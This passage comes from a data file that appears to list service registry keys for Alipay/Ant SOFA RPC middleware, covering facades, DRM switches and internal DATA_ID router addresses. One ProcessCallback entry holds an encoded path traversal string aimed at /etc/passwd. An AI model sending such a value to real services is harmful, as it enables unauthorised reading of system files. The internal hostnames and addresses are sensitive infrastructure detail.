logicide.common.service.facade.api.BizLogicDeployRecordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imasp.common.service.facade.MultiVersionServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imemberprod.service.facade.api.LoginAppService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.224.61#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchprod.common.service.facade.merchant.MrchProdBankInfoValidateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ctu.service.analyze.facade.CtuAntiCheatAnalyzeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insusercenter.facade.myservices.api.InsMyServicesFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.asset.AssetPrepareService:1.0:guarcoreFluxService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.210.115#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.167.205.138#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.lifeprod.common.service.facade.api.marketing.LifeMarketingItemManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ipayment.service.facade.api.FreezeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskmng.common.service.facade.api.RiskModelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizops.facade.ParamRuleAutoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zdatacontextLoadTestTBaseCache.serializationType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.basementweb.BpmsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antcloud.dds.zdal.interfaces.endpoint.facade.rest.GroupClusterRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.promohelix.common.service.facade.api.sci.SciTaskGroupQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.omocore.common.knowledge.api.ScriptContentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insrenewprod.common.service.facade.api.renewal.InsRenewalAutoInsureFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.150.11#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.merchant.common.service.facade.MerchantAgentService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.46.20#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.ActiveServiceRuleSwitchDrm.openActiveServiceRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.mrchiscore:name=com.alipay.mrchiscore.generic.switch.vipBizSsuCodes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insusercenter.facade.loadtest.api.PolicyAndFamilyModuleLoadTestFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.omoaidbase.common.service.facade.videocall.VideoCallQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insclaiminvestcore.biz.settle.service.SettleQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.channel.ChannelConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.inshealthclaimmng.workorder.facade.WorkOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fingiftprod.common.service.facade.gift.GoldenGiftCloseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rule.common.base.service.ScriptValidateService:1.0:AMLINTELLIJOPERATION@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autoinsprod.common.service.facade.ClaimFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finsnsbff:name=com.alipay.finsnsbff.battle.hotlistSpecialId,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditmerchant.service.facade.HbProductOrderMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.huanyu.facade.change.ChangePlanCallback:1.0:huanyu-test-callback-1@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.securitycap:name=com.alipay.securitycap.core.service.threshold.drm.ProfilerThresholdResource.durationLimit,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.ordercore:name=com.alipay.ordercore.drop.level.dragonxSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.erecon.core.service.file.process.api.ErcOssFileWriteService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfinvest.facade.api.during.InvestDuringInfoManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.zpublishuiweb.zpublishuiweb_ds.slowSql,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alibaba.dt.onedata.dwm.client.definition.DefinitionOpenService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.agdscc.common.service.facade.service.credit.AgdsccPCCreditHbPlatformFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmTairVersionManager.cdsSceneGray,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.voucherprod.facade.api.template.VcpVoucherTemplateBudgetQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappcommon.common.service.facade.baas.PublishDashboardDetailFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.extend-request:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_S_GOTONE_MESSAGE_SENDER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.insdataprod.common.service.facade.mdm.api.MdmFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeapcore:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.slaLogParamSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.publiccore.biz.service.impl.rpc.LifeServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordermng.common.service.api.merchant.WhiteListService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antlescenter.common.service.facade.api.AesSignTaskService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finance.filefactory.sevice.FilePlatformParseReceiver:1.0:tradefront@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finopenscene.facade.wealthahead.WealthAheadFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.govdataprod.mychain.gov.facade.tdm.api.TdmDataUseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mshopcenter.common.service.facade.api.ExtShopManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfmac.common.service.plan.facade.api.BizBudgetQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.46.63#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.customscenter:name=com.alipay.common.tracer.manage.TracerDrm.zdalDbDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_LIBRACORE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finvirtualta.common.service.facade.fund.FundCommonFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.middlewareSwitch:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.xfireMaxConnectionMosn,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.uemprod.common.service.facade.menumng.MenuItemServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocenter.facade.api.MerchantInfoQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.paydecision:name=com.alipay.paydecision.service.client.common.resource.PayDecisionNearBySwitchResource.lockFreeAssetTypeQuery,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.voucherprod.facade.api.sample.VcpSampleManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.searchportal.common.service.facade.appcenter.SchAppDeployFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_11.158.123.213#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.insmobile:name=com.alipay.insmobile.biz.community.drm.CommunityDrm.tairCacheTimeout,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.auth_center.common.service.facade.protocol.UserAuthStateSyncService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antcloud.dds.zdal.interfaces.endpoint.facade.rest.ConnPropsRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.insmarketingcore.common.service.facade.promorule.InsMktPromoRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.merchant.MrchProdFieldFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappcommon.common.service.facade.baas.ProductUpgradeSpecialConfigMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-miniselfop-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.openhome.facade.process.callback.UniformProcessCallback:1.0:sceneSolutionCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_F_SHOP#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.insautomarket.common.facade.cicada.AutoMktCommentDataFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insiop.common.service.facade.recommend.RecommendFacade:1.0:insplatform@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.distinguishprod.common.service.facade.ResIdentifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.credible.CredibleIPService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dmeta.facade.datadomain.DataDomainFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordercore.common.service.facade.order.OrderLogQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.StarWishDrmImpl.batchAuditWaitDays,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ifxquote.service.facade.api.IfxQuotePushFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.82.87.220#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.tradeexprod:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableGlobalSerializeBlackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.budgetDistributeGrayConfigString,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.nodejs.ConsumerService:1.0:zoneroute-only-type-param@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloudstrategy.facade.check.ConflictCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kgmng.common.service.facade.ruleinference.DslSampleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.shared.common.schedule.thread.SubmitLoanApply.maxPoolSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.mrchservbase.member.facade.prepaidcard.CardFundFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.23.234.109#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbservcore.common.service.client.spi.SPInterface:1.0:crmhomeSPInterface@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clivecenter.common.service.facade.api.ClcUpdateServerStatusService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.airbops:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.customServiceGroup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.bkpromocore.common.service.facade.QianniuRouteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mordercenter.common.service.facade.api.OrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.client.qaZQueue35#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.antcloud.cloudauth.common.service.facade.oauth.AccessTokenFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ngfe:name=com.alipay.ufe.connector.base.drm.CommonConnectorDrm.lindormLinkConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.bbcmng.immunemng.facade.ImmTrCheckFacade:1.0:inscheck@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mmemberprod.common.service.facade.MemberActivateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbrecruit.common.service.facade.batch.BatchProcessQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.certifycenter.service.facade.verify.VerificationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bkpromofront.facade.benefit.api.BenefitItemOperateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:CREDITGOVERNANCE_ZHIMAGO_TEMPLATE_BATCH@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.adc.schedule.facade.ScheduleServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:mobileic@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imemberprod.service.facade.api.OperatorQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.finorm.finriskcenter.common.facade.api.guardian.BizExceptionRecordServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.autoinsprod.common.insure.v2.AutoEnquiryFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antcloud.yunyou.facade.ReleaseWindowFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:bizrecon@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpaas:name=com.alipay.common.security.dresource.SecurityCommonDrm.uriCheckEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finsnsbff:name=com.alipay.finsnsbff.spring.isCloseSpringTwentyForum,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Sub_Servers_TP_M_FINANCE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:codprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:oneapi-app@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ofpgrowth.common.service.facade.api.NumberOneCardManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkinstportal.common.service.facade.achievement.api.QrSituationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdeduct.common.service.facade.agreement.AuthorizationVerifyCallBackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_fundAutoTransferInCloseProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fcrcportal:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.responseExceptionIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.165.137#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.socialportal.web.market.rpc.facade.ServiceCouponFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_USER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.test.SimpleService-35#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pointprod.commom.manage.facade.exchange.api.QueryExchangeInstructionService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.RepayRemindGreyDrm.greyProportionStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.38.52.69#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifin:name=com.alipay.common.tracer.manage.TracerDrm.zdalOcsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","_CLIENTSERVICE_TEST_13#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.accenter.service.facade.api.AccenterTaxAccruedQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nfcc.common.service.facade.DisasterRecoverQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.risk.FaultInjectFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.checkroute.common.service.checkersdk.drm.SDKConfigDRM.checkerExecuteTimeOut,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.charge:name=com.alipay.charge.common.dal.conf.impl.ChargeNewDRMConfigureImpl.openV3RefundRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.intel.service.api.pacioli.FileConvertFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.csshield.service.facade.api.MarkCheckFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:psslip@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.incomestatistics.facade.api.IncomeStatisticsHuabeiFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-riskdatacenter-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.zdatabus.service.facade.lineage.DataLineageService:1.0:zdatabus-compatibility-idbusYuebao@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.distinguishprod.common.service.facade.ResTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antinvoice.common.service.facade.miniapp.EinvInvoiceApplyZoneFacade:1.0:einvInvoiceApplyZoneFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.test:name=com.alipay.fc.iriskperceptcenter.rpoints.drm.RpointsCommonConfigResource.indicatorRiskMapTopN,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openitemcore.common.service.facade.api.management.aegis.AegisServConfigMngFacade:1.0:APPXCORE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipaymo.momobilewallet.common.facade.register.IpayUserRegisterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.common.datacollector.rule.internal.DataModelRuleCoordinator.dataModelWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.done.common.service.facade.virtualassets.VirtualEntityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaascoreng.facade.migrate.ContainerQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppgw.facade.mng.IndustrygwMessageProcessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppprod.common.service.facade.recharge.RechargeRecordQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.favorite.api.FavoriteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_K_IDCENTER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cloud.apfasmng.common.service.facade.serverlessplan.ServerlessPlanPrepostFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.AttributeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paymentmng.service.facade.scienguide.RuleItemManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gffund.common.service.facade.api.autopilot.AutoPilotConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.hyp.core.api.HyCheckTaskRunService:1.0:ol-adjust-mgt-check@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpaas:name=com.alipay.common.security.dresource.SecurityCommonDrm.paramCheckEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.73.166.81#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA_PRC_TRANSMIT_PCREDITMNG#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.210.184#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:dqs@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.salesmng.common.service.facade.merchant.api.CrmMerchantBelongService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.manager.BuEventManager:1.0:antacl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antlegalchain.common.service.facade.api.NdaSignFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstm.common.service.facade.uniform.facade.UniformItemFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.208.63.131#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.meshyopt.common.service.facade.api.DeliveryQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imerchprod.globalsite.facade.api.onboard.StandardOnboardInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchservbase.common.service.task.external.service.TaskRzServiceFacade:1.0:mrchservbaseRzFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.merchant.MrchProdFieldQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.changecontrol.callback.service.TriggerEventService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mmtcaftscmdproc.common.service.facade.OtaDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.acquirecenter.common.service.facade.api.VoidApplyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:video_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paymentmng.service.facade.settlecore.BankcodeConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.85.63#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.csconfig.service.mng.facade.api.TagManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:mrchdtunical@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.voucherprod.facade.api.template.VcpVoucherTemplateQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csconfig.service.mng.facade.api.ConfigManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.aip.AipTestFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcomment.common.service.facade.comment.PraiseQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.multimediabase.facade.core.BoardQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.onedata3.model.service.DataProfilingPreviewService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fininfo:name=com.alipay.zdal.ldc.tair.fininfoDataTairCache.tbaseClientWarmup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.mobilegeocoding:name=com.alipay.dwebupload.client.drm.DomainConfig.uploadTarget,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.promocenter:name=com.alipay.promocenter.biz.daemon.drm.DiscountBizParamResource.maxInvalidGap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zmp.rest.MessagePushRest#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmCdsTempManager.serviceQueryUpdate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.8.140#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaljdbc:name=com.alipay.zdal.jdbc.comprehensive.gfas.gfasShardingDataSource.operation,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ap.settlement.common.service.facade.api.SyncTransInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:yebpromobff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.acquirecenter.service.facade.api.OrderQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.velocity.component.VelocityQueryComponent:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.kbdelivery.KbdeliveryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcardcore.common.service.facade.PcardCardManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.28.126#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cif.facade.UserBizInfoQueryService:1.